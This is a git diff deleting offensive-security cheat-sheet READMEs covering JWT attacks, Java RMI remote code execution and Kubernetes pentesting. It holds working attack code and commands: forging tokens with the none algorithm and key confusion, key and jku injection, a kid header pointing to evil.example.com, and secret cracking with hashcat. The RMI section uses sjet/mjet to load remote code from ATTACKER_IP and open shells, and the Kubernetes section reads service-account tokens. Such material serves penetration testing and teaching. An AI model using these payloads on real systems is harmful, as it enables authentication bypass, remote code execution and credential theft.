-**Deconstructed**: -```json -{"alg":"HS256","typ":"JWT"}. -{"sub":"1234567890","name":"John Doe","iat":1516239022} -``` - - -### JWT Signature - Disclosure of a correct signature (CVE-2019-7644) - -Send a JWT with an incorrect signature, the endpoint might respond with an error disclosing the correct one. - -* [jwt-dotnet/jwt: Critical Security Fix Required: You disclose the correct signature with each SignatureVerificationException... #61](https://github.com/jwt-dotnet/jwt/issues/61) -* [CVE-2019-7644: Security Vulnerability in Auth0-WCF-Service-JWT](https://auth0.com/docs/secure/security-guidance/security-bulletins/cve-2019-7644) - -``` -Invalid signature. Expected SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c got 9twuPVu9Wj3PBneGw1ctrf3knr7RX12v-UwocfLhXIs -Invalid signature. Expected 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgB1Y= got 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgBOo= -``` - - -### JWT Signature - None Algorithm (CVE-2015-9235) - -JWT supports a `None` algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application. - -None algorithm variants: -* none -* None -* NONE -* nOnE - -To exploit this vulnerability, you just need to decode the JWT and change the algorithm used for the signature. Then you can submit your new JWT. However, this won't work unless you **remove** the signature - -Alternatively you can modify an existing JWT (be careful with the expiration time) - -* Using [ticarpi/jwt_tool](#) - ```ps1 - python3 jwt_tool.py [JWT_HERE] -X a - ``` - -* Manually editing the JWT - ```python - import jwt - - jwtToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ' - decodedToken = jwt.decode(jwtToken, verify=False) - - # decode the token before encoding with type 'None' - noneEncoded = jwt.encode(decodedToken, key='', algorithm=None) - - print(noneEncoded.decode()) - ``` - - -### JWT Signature - Key Confusion Attack RS256 to HS256 (CVE-2016-5431) - -If a server’s code is expecting a token with "alg" set to RSA, but receives a token with "alg" set to HMAC, it may inadvertently use the public key as the HMAC symmetric key when verifying the signature. - -Because the public key can sometimes be obtained by the attacker, the attacker can modify the algorithm in the header to HS256 and then use the RSA public key to sign the data. When the applications use the same RSA key pair as their TLS web server: `openssl s_client -connect example.com:443 | openssl x509 -pubkey -noout` - -> The algorithm **HS256** uses the secret key to sign and verify each message. -> The algorithm **RS256** uses the private key to sign the message and uses the public key for authentication. - -```python -import jwt -public = open('public.pem', 'r').read() -print public -print jwt.encode({"data":"test"}, key=public, algorithm='HS256') -``` - -:warning: This behavior is fixed in the python library and will return this error `jwt.exceptions.InvalidKeyError: The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret.`. You need to install the following version: `pip install pyjwt==0.4.3`. - -* Using [ticarpi/jwt_tool](#) - ```ps1 - python3 jwt_tool.py JWT_HERE -X k -pk my_public.pem - ``` -* Using [portswigger/JWT Editor](https://portswigger.net/bappstore/26aaa5ded2f74beea19e2ed8345a93dd) - 1. Find the public key, usually in `/jwks.json` or `/.well-known/jwks.json` - 2. Load it in the JWT Editor Keys tab, click `New RSA Key`. - 3. . In the dialog, paste the JWK that you obtained earlier: `{"kty":"RSA","e":"AQAB","use":"sig","kid":"961a...85ce","alg":"RS256","n":"16aflvW6...UGLQ"}` - 4. Select the PEM radio button and copy the resulting PEM key. - 5. Go to the Decoder tab and Base64-encode the PEM. - 6. Go back to the JWT Editor Keys tab and generate a `New Symmetric Key` in JWK format. - 7. Replace the generated value for the k parameter with a Base64-encoded PEM key that you just copied. - 8. Edit the JWT token alg to `HS256` and the data. - 9. Click `Sign` and keep the option: `Don't modify header` - -* Manually using the following steps to edit an RS256 JWT token into an HS256 - 1. Convert our public key (key.pem) into HEX with this command. - - ```powershell - $ cat key.pem | xxd -p | tr -d "\\n" - 2d2d2d2d2d424547494e20505[STRIPPED]592d2d2d2d2d0a - ``` - - 2. Generate HMAC signature by supplying our public key as ASCII hex and with our token previously edited. - - ```powershell - $ echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ" | openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e20505[STRIPPED]592d2d2d2d2d0a - - (stdin)= 8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0 - ``` - - 3. Convert signature (Hex to "base64 URL") - - ```powershell - $ python2 -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0')).replace('=','')\")" - ``` - - 4. Add signature to edited payload - - ```powershell - [HEADER EDITED RS256 TO HS256].[DATA EDITED].[SIGNATURE] - eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ.j0IbNR62H_Im34jVJqfpubt7gjlojB-GLyYaDFiJEOA - ``` - - -### JWT Signature - Key Injection Attack (CVE-2018-0114) - -> A vulnerability in the Cisco node-jose open source library before 0.11.0 could allow an unauthenticated, remote attacker to re-sign tokens using a key that is embedded within the token. The vulnerability is due to node-jose following the JSON Web Signature (JWS) standard for JSON Web Tokens (JWTs). This standard specifies that a JSON Web Key (JWK) representing a public key can be embedded within the header of a JWS. This public key is then trusted for verification. An attacker could exploit this by forging valid JWS objects by removing the original signature, adding a new public key to the header, and then signing the object using the (attacker-owned) private key associated with the public key embedded in that JWS header. - - -**Exploit**: -* Using [ticarpi/jwt_tool] - ```ps1 - python3 jwt_tool.py [JWT_HERE] -X i - ``` -* Using [portswigger/JWT Editor](#) - 1. Add a `New RSA key` - 2. In the JWT's Repeater tab, edit data - 3. `Attack` > `Embedded JWK` - -**Deconstructed**: -```json -{ - "alg": "RS256", - "typ": "JWT", - "jwk": { - "kty": "RSA", - "kid": "jwt_tool", - "use": "sig", - "e": "AQAB", - "n": "uKBGiwYqpqPzbK6_fyEp71H3oWqYXnGJk9TG3y9K_uYhlGkJHmMSkm78PWSiZzVh7Zj0SFJuNFtGcuyQ9VoZ3m3AGJ6pJ5PiUDDHLbtyZ9xgJHPdI_gkGTmT02Rfu9MifP-xz2ZRvvgsWzTPkiPn-_cFHKtzQ4b8T3w1vswTaIS8bjgQ2GBqp0hHzTBGN26zIU08WClQ1Gq4LsKgNKTjdYLsf0e9tdDt8Pe5-KKWjmnlhekzp_nnb4C2DMpEc1iVDmdHV2_DOpf-kH_1nyuCS9_MnJptF1NDtL_lLUyjyWiLzvLYUshAyAW6KORpGvo2wJa2SlzVtzVPmfgGW7Chpw" - } -}. -{"login":"admin"}. -[Signed with new Private key; Public key injected] -``` - - -## JWT Secret - -> To create a JWT, a secret key is used to sign the header and payload, which generates the signature. The secret key must be kept secret and secure to prevent unauthorized access to the JWT or tampering with its contents. If an attacker is able to access the secret key, they can create, modify or sign their own tokens, bypassing the intended security controls. - -### Encode and Decode JWT with the secret - -* Using [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool): - ```ps1 - jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiSm9obiBEb2UifQ.xuEv8qrfXu424LZk8bVgr9MQJUIrp1rHcPyZw_KSsds - jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiSm9obiBEb2UifQ.xuEv8qrfXu424LZk8bVgr9MQJUIrp1rHcPyZw_KSsds -T - - Token header values: - [+] alg = "HS256" - [+] typ = "JWT" - - Token payload values: - [+] name = "John Doe" - ``` -* Using [pyjwt](https://pyjwt.readthedocs.io/en/stable/): `pip install pyjwt` - ```python - import jwt - encoded = jwt.encode({'some': 'payload'}, 'secret', algorithm='HS256') - jwt.decode(encoded, 'secret', algorithms=['HS256']) - ``` - -### Break JWT secret - -Useful list of 3502 public-available JWT: [wallarm/jwt-secrets/jwt.secrets.list](https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list), including `your_jwt_secret`, `change_this_super_secret_random_string`, etc. - - -#### JWT tool - -First, bruteforce the "secret" key used to compute the signature using [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool) - -```powershell -python3 -m pip install termcolor cprint pycryptodomex requests -python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI -d /tmp/wordlist -C -``` - -Then edit the field inside the JSON Web Token. - -```powershell -Current value of role is: user -Please enter new value and hit ENTER -> admin -[1] sub = 1234567890 -[2] role = admin -[3] iat = 1516239022 -[0] Continue to next step - -Please select a field number (or 0 to Continue): -> 0 -``` - -Finally, finish the token by signing it with the previously retrieved "secret" key. - -```powershell -Token Signing: -[1] Sign token with known key -[2] Strip signature from token vulnerable to CVE-2015-2951 -[3] Sign with Public Key bypass vulnerability -[4] Sign token with key file - -Please select an option from above (1-4): -> 1 - -Please enter the known key: -> secret - -Please enter the key length: -[1] HMAC-SHA256 -[2] HMAC-SHA384 -[3] HMAC-SHA512 -> 1 - -Your new forged token: -[+] URL safe: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.xbUXlOQClkhXEreWmB3da_xtBsT0Kjw7truyhDwF5Ic -[+] Standard: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.xbUXlOQClkhXEreWmB3da/xtBsT0Kjw7truyhDwF5Ic -``` - -* Recon: `python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw` -* Scanning: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -M pb` -* Exploitation: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin` -* Fuzzing: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -I -hc kid -hv custom_sqli_vectors.txt` -* Review: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin` - - -#### Hashcat - -> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](https://twitter.com/hashcat/status/955154646494040065) - -* Dictionary attack: `hashcat -a 0 -m 16500 jwt.txt wordlist.txt` -* Rule-based attack: `hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rule` -* Brute force attack: `hashcat -a 3 -m 16500 jwt.txt ?u?l?l?l?l?l?l?l -i --increment-min=6` - - -## JWT Claims - -[IANA's JSON Web Token Claims](https://www.iana.org/assignments/jwt/jwt.xhtml) - - -### JWT kid Claim Misuse - -The "kid" (key ID) claim in a JSON Web Token (JWT) is an optional header parameter that is used to indicate the identifier of the cryptographic key that was used to sign or encrypt the JWT. It is important to note that the key identifier itself does not provide any security benefits, but rather it enables the recipient to locate the key that is needed to verify the integrity of the JWT. - -* Example #1 : Local file - ```json - { - "alg": "HS256", - "typ": "JWT", - "kid": "/root/res/keys/secret.key" - } - ``` - -* Example #2 : Remote file - ```json - { - "alg":"RS256", - "typ":"JWT", - "kid":"http://localhost:7070/privKey.key" - } - ``` - -The content of the file specified in the kid header will be used to generate the signature. - -```js -// Example for HS256 -HMACSHA256( - base64UrlEncode(header) + "." + - base64UrlEncode(payload), - your-256-bit-secret-from-secret.key -) -``` - -The common ways to misuse the kid header: -* Get the key content to change the payload -* Change the key path to force your own - ```py - >>> jwt.encode( - ... {"some": "payload"}, - ... "secret", - ... algorithm="HS256", - ... headers={"kid": "http://evil.example.com/custom.key"}, - ... ) - ``` - -* Change the key path to a file with a predictable content. - ```ps1 - python3 jwt_tool.py -I -hc kid -hv "../../dev/null" -S hs256 -p "" - python3 jwt_tool.py -I -hc kid -hv "/proc/sys/kernel/randomize_va_space" -S hs256 -p "2" - ``` - -* Modify the kid header to attempt SQL and Command Injections - - -### JWKS - jku header injection - -"jku" header value points to the URL of the JWKS file. By replacing the "jku" URL with an attacker-controlled URL containing the Public Key, an attacker can use the paired Private Key to sign the token and let the service retrieve the malicious Public Key and verify the token. - -It is sometimes exposed publicly via a standard endpoint: - -* `/jwks.json` -* `/.well-known/jwks.json` -* `/openid/connect/jwks.json` -* `/api/keys` -* `/api/v1/keys` - -You should create your own key pair for this attack and host it. It should look like that: - -```json -{ - "keys": [ - { - "kid": "beaefa6f-8a50-42b9-805a-0ab63c3acc54", - "kty": "RSA", - "e": "AQAB", - "n": "nJB2vtCIXwO8DN[...]lu91RySUTn0wqzBAm-aQ" - } - ] -} -``` - -**Exploit**: - -* Using [ticarpi/jwt_tool] - ```ps1 - python3 jwt_tool.py JWT_HERE -X s - python3 jwt_tool.py JWT_HERE -X s -ju http://example.com/jwks.json - ``` -* Using [portswigger/JWT Editor](#) - 1. Generate a new RSA key and host it - 2. Edit JWT's data - 3. Replace the `kid` header with the one from your JWKS - 4. Add a `jku` header and sign the JWT (`Don't modify header` option should be checked) - -**Deconstructed**: - -```json -{"typ":"JWT","alg":"RS256", "jku":"https://example.com/jwks.json", "kid":"id_of_jwks"}. -{"login":"admin"}. -[Signed with new Private key; Public key exported] -``` - - -## Labs - -* [JWT authentication bypass via unverified signature](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature) -* [JWT authentication bypass via flawed signature verification](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification) -* [JWT authentication bypass via weak signing key](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-weak-signing-key) -* [JWT authentication bypass via jwk header injection](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injection) -* [JWT authentication bypass via jku header injection](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection) -* [JWT authentication bypass via kid header path traversal](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal) - -## References - -- [5 Easy Steps to Understanding JSON Web Token](https://medium.com/cyberverse/five-easy-steps-to-understand-json-web-tokens-jwt-7665d2ddf4d5) -- [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/) -- [Club EH RM 05 - Intro to JSON Web Token Exploitation - Nishacid](https://www.youtube.com/watch?v=d7wmUz57Nlg) -- [Critical vulnerabilities in JSON Web Token libraries - March 31, 2015 - Tim McLean](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//) -- [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6) -- [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://web.archive.org/web/20220305042224/https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) -- [Hacking JSON Web Tokens - medium.com Oct 2019](https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a) -- [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/) -- [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9) -- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight Senior Security Consultant - April 16, 2020](https://insomniasec.com/blog/auth0-jwt-validation-bypass) -- [JSON Web Token Vulnerabilities - 0xn3va](https://0xn3va.gitbook.io/cheat-sheets/web-application/json-web-token-vulnerabilities) -- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/) -- [Learn how to use JSON Web Tokens (JWT) for Authentication - @dwylhq](https://github.com/dwyl/learn-json-web-tokens) -- [Privilege Escalation like a Boss - October 27, 2018 - janijay007](https://blog.securitybreached.org/2018/10/27/privilege-escalation-like-a-boss/) -- [Simple JWT hacking - @b1ack_h00d](https://medium.com/@blackhood/simple-jwt-hacking-73870a976750) -- [WebSec CTF - Authorization Token - JWT Challenge](https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/) -- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](https://web.archive.org/web/20210512205928/https://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) \ No newline at end of file diff --git a/Java RMI/README.md b/Java RMI/README.md deleted file mode 100644 index bcda553..0000000 --- a/Java RMI/README.md +++ /dev/null @@ -1,121 +0,0 @@ -# Java RMI - -> Exposing a weak configured Java Remote Method Invocation (RMI) service can lead to several ways to achieve RCE. -> One such attack is to host an MLet file and instruct the JMX service to load MBeans from the remote host which can be carried out -> using the tools mjet or sjet. remote-method-guesser is a more recent tool which bundles enumeration of RMI services together -> with a summary of currently known attack techniques. - -## Summary - -* [Tools](#tools) -* [Detection](#detection) -* [Exploitation](#exploitation) - * [RCE using sjet/mjet](#rce-using-sjet-or-mjet) -* [References](#references) - -## Tools - -- [sjet](https://github.com/siberas/sjet) -- [mjet](https://github.com/mogwailabs/mjet) -- [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) - -## Detection - -Using [nmap](https://nmap.org/): -```powershell -$ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v -1089/tcp open java-rmi Java RMI -| rmi-vuln-classloader: -| VULNERABLE: -| RMI registry default configuration remote code execution vulnerability -| State: VULNERABLE -| Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution. -| rmi-dumpregistry: -| jmxrmi -| javax.management.remote.rmi.RMIServerImpl_Stub -``` - -Using [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser): -```bash -$ rmg scan 172.17.0.2 --ports 0-65535 -[+] Scanning 6225 Ports on 172.17.0.2 for RMI services. -[+] -[+] [HIT] Found RMI service(s) on 172.17.0.2:40393 (DGC) -[+] [HIT] Found RMI service(s) on 172.17.0.2:1090 (Registry, DGC) -[+] [HIT] Found RMI service(s) on 172.17.0.2:9010 (Registry, Activator, DGC) -[+] [6234 / 6234] [#############################] 100% -[+] -[+] Portscan finished. -``` - -```bash -$ rmg enum 172.17.0.2 9010 -[+] RMI registry bound names: -[+] -[+] - plain-server2 -[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class) -[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff7, 9040809218460289711] -[+] - legacy-service -[+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class) -[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ffc, 4854919471498518309] -[+] - plain-server -[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class) -[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff8, 6721714394791464813] -[...] -``` - -Using Metasploit -```bash -use auxiliary/scanner/misc/java_rmi_server -set RHOSTS -set RPORT -run -``` - -## Exploitation - -### RCE using sjet or mjet - -#### Requirements -- Jython -- The JMX server can connect to a http service that is controlled by the attacker -- JMX authentication is not enabled - -#### Remote Command Execution - -The attack involves the following steps: -* Starting a web server that hosts the MLet and a JAR file with the malicious MBeans -* Creating a instance of the MBean javax.management.loading.MLet on the target server, using JMX -* Invoking the "getMBeansFromURL" method of the MBean instance, passing the webserver URL as parameter. The JMX service will connect to the http server and parse the MLet file. -* The JMX service downloads and loades the JAR files that were referenced in the MLet file, making the malicious MBean available over JMX. -* The attacker finally invokes methods from the malicious MBean. - -Exploit the JMX using [sjet](https://github.com/siberas/sjet) or [mjet](https://github.com/mogwailabs/mjet) - -```powershell -jython sjet.py TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000 -jython sjet.py TARGET_IP TARGET_PORT super_secret command "ls -la" -jython sjet.py TARGET_IP TARGET_PORT super_secret shell -jython sjet.py TARGET_IP TARGET_PORT super_secret password this-is-the-new-password -jython sjet.py TARGET_IP TARGET_PORT super_secret uninstall -jython mjet.py --jmxrole admin --jmxpassword adminpassword TARGET_IP TARGET_PORT deserialize CommonsCollections6 "touch /tmp/xxx" - -jython mjet.py TARGET_IP TARGET_PORT install super_secret http://ATTACKER_IP:8000 8000 -jython mjet.py TARGET_IP TARGET_PORT command super_secret "whoami" -jython mjet.py TARGET_IP TARGET_PORT command super_secret shell -``` - -### RCE using Metasploit -```bash -use exploit/multi/misc/java_rmi_server -set RHOSTS -set RPORT -# configure also the payload if needed -run -``` - -## References - -* [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH, 28 April 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/) -* [JMX RMI – MULTIPLE APPLICATIONS RCE - Red Timmy Security, 26 March 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi-–-multiple-applications-remote-code-execution.pdf) -* [remote-method-guesser - BHUSA 2021 Arsenal - Tobias Neitzel, 15 August 2021](https://www.slideshare.net/TobiasNeitzel/remotemethodguesser-bhusa2021-arsenal) diff --git a/Kubernetes/README.md b/Kubernetes/README.md deleted file mode 100644 index b1269fc..0000000 --- a/Kubernetes/README.md +++ /dev/null @@ -1,303 +0,0 @@ -# Kubernetes - -> Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation. - -## Summary - -- [Tools](#tools) -- [Container Environment](#container-environment) -- [Information Gathering](#information-gathering) -- [RBAC Configuration](#rbac-configuration) - - [Listing Secrets](#listing-secrets) - - [Access Any Resource or Verb](#access-any-resource-or-verb) - - [Pod Creation](#pod-creation) - - [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec) - - [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings) - - [Impersonating a Privileged Account](#impersonating-a-privileged-account) -- [Privileged Service Account Token](#privileged-service-account-token) -- [Interesting endpoints to reach](#interesting-endpoints-to-reach) -- [API addresses that you should know](#api-addresses-that-you-should-know) -- [References](#references) - -## Tools - -* [kubeaudit](https://github.com/Shopify/kubeaudit) - Audit Kubernetes clusters against common security concerns -* [kubesec.io](https://kubesec.io/) - Security risk analysis for Kubernetes resources -* [kube-bench](https://github.com/aquasecurity/kube-bench) - Checks whether Kubernetes is deployed securely by running [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes/) -* [kube-hunter](https://github.com/aquasecurity/kube-hunter) - Hunt for security weaknesses in Kubernetes clusters -* [katacoda](https://katacoda.com/courses/kubernetes) - Learn Kubernetes using interactive broser-based scenarios -* [kubescape](https://github.com/armosec/kubescape) - Automate Kubernetes cluster scans to identify security issues - -## Container Environment - -Containers within a Kubernetes cluster automatically have certain information made available to them through their [container environment](https://kubernetes.io/docs/concepts/containers/container-environment/). Additional information may have been made available through the volumes, environment variables, or the downward API, but this section covers only what is made available by default. - -### Service Account - -Each Kubernetes pod is assigned a service account for accessing the Kubernetes API. The service account, in addition to the current namespace and Kubernetes SSL certificate, are made available via a mounted read-only volume: - -``` -/var/run/secrets/kubernetes.io/serviceaccount/token -/var/run/secrets/kubernetes.io/serviceaccount/namespace -/var/run/secrets/kubernetes.io/serviceaccount/ca.crt -``` - -If the `kubectl` utility is installed in the container, it will use this service account automatically and will make interacting with the cluster much easier. If not, the contents of the `token` and `namespace` files can be used to make HTTP API requests directly. - -### Environment Variables - -The `KUBERNETES_SERVICE_HOST` and `KUBERNETES_SERVICE_PORT` environment variables are automatically provided to the container. They contain the IP address and port number of the Kubernetes master node. If `kubectl` is installed, it will use these values automatically. If not, the values can be used to determine the correct IP address to send API requests to. - -``` -KUBERNETES_SERVICE_HOST=192.168.154.228 -KUBERNETES_SERVICE_PORT=443 -``` - -Additionally, [environment variables](https://kubernetes.io/docs/concepts/services-networking/service/#discovering-services) are automatically created for each Kubernetes service running in the current namespace when the container was created. The environment variables are named using two patterns: - -- A simplified `{SVCNAME}_SERVICE_HOST` and `{SVCNAME}_SERVICE_PORT` contain the IP address and default port number for the service. -- A [Docker links](https://docs.docker.com/network/links/#environment-variables) collection of variables named `{SVCNAME}_PORT_{NUM}_{PROTOCOL}_{PROTO|PORT|ADDR}` for each port the service exposes. - -For example, all of the following environment variables would be available if a `redis-master` service were running with port 6379 exposed: - -``` -REDIS_MASTER_SERVICE_HOST=10.0.0.11 -REDIS_MASTER_SERVICE_PORT=6379 -REDIS_MASTER_PORT=tcp://10.0.0.11:6379 -REDIS_MASTER_PORT_6379_TCP=tcp://10.0.0.11:6379 -REDIS_MASTER_PORT_6379_TCP_PROTO=tcp -REDIS_MASTER_PORT_6379_TCP_PORT=6379 -REDIS_MASTER_PORT_6379_TCP_ADDR=10.0.0.11 -``` - -### Simulating `kubectl` API Requests - -Most containers within a Kubernetes cluster won't have the `kubectl` utility installed. If running the [one-line `kubectl` installer](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) within the container isn't an option, you may need to craft Kubernetes HTTP API requests manually. This can be done by using `kubectl` *locally* to determine the correct API request to send from the container. - -1. Run the desired command at the maximum verbosity level using `kubectl -v9 ...` -1. The output will include HTTP API endpoint URL, the request body, and an example curl command. -1. Replace the endpoint URL's hostname and port with the `KUBERNETES_SERVICE_HOST` and `KUBERNETES_SERVICE_PORT` values from the container's environment variables. -1. Replace the masked "Authorization: Bearer" token value with the contents of `/var/run/secrets/kubernetes.io/serviceaccount/token` from the container. -1. If the request had a body, ensure the "Content-Type: application/json" header is included and send the request body using the customary method (for curl, use the `--data` flag). - -For example, this output was used to create the [Service Account Permissions](#service-account-permissions) request: - -```powershell -# NOTE: only the Authorization and Content-Type headers are required. The rest can be omitted. -$ kubectl -v9 auth can-i --list -I1028 18:58:38.192352 76118 loader.go:359] Config loaded from file /home/example/.kube/config -I1028 18:58:38.193847 76118 request.go:942] Request Body: {"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","metadata":{"creationTimestamp":null},"spec":{"namespace":"default"},"status":{"resourceRules":null,"nonResourceRules":null,"incomplete":false}} -I1028 18:58:38.193912 76118 round_trippers.go:419] curl -k -v -XPOST -H "Accept: application/json, */*" -H "Content-Type: application/json" -H "User-Agent: kubectl/v1.14.10 (linux/amd64) kubernetes/f5757a1" 'https://1.2.3.4:5678/apis/authorization.k8s.io/v1/selfsubjectrulesreviews' -I1028 18:58:38.295722 76118 round_trippers.go:438] POST https://1.2.3.4:5678/apis/authorization.k8s.io/v1/selfsubjectrulesreviews 201 Created in 101 milliseconds -I1028 18:58:38.295760 76118 round_trippers.go:444] Response Headers: -... -``` - -## Information Gathering - -### Service Account Permissions - -The default service account may have been granted additional permissions that make cluster compromise or lateral movement easier. -The following can be used to determine the service account's permissions: - -```powershell -# Namespace-level permissions using kubectl -kubectl auth can-i --list - -# Cluster-level permissions using kubectl -kubectl auth can-i --list --namespace=kube-system - -# Permissions list using curl -NAMESPACE=$(cat "/var/run/secrets/kubernetes.io/serviceaccount/namespace") -# For cluster-level, use NAMESPACE="kube-system" instead - -MASTER_URL="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}" -TOKEN=$(cat "/var/run/secrets/kubernetes.io/serviceaccount/token") -curl "${MASTER_URL}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \ - --cacert "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt" \ - --header "Authorization: Bearer ${TOKEN}" \ - --header "Content-Type: application/json" \ - --data '{"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","spec":{"namespace":"'${NAMESPACE}'"}}' -``` - -### Secrets, ConfigMaps, and Volumes - -Kubernetes provides Secrets and ConfigMaps as a way to load configuration into containers at runtime. While they may not lead directly to whole cluster compromise, the information they contain can lead to individual service compromise or enable lateral movement within a cluster. - -From a container perspective, Kubernetes Secrets and ConfigMaps are identical. Both can be loaded into environment variables or mounted as volumes. It's not possible to determine if an environment variable was loaded from a Secret/ConfigMap, so each environment variable will need to be manually inspected. When mounted as a volume, Secrets/ConfigMaps are always mounted as read-only tmpfs 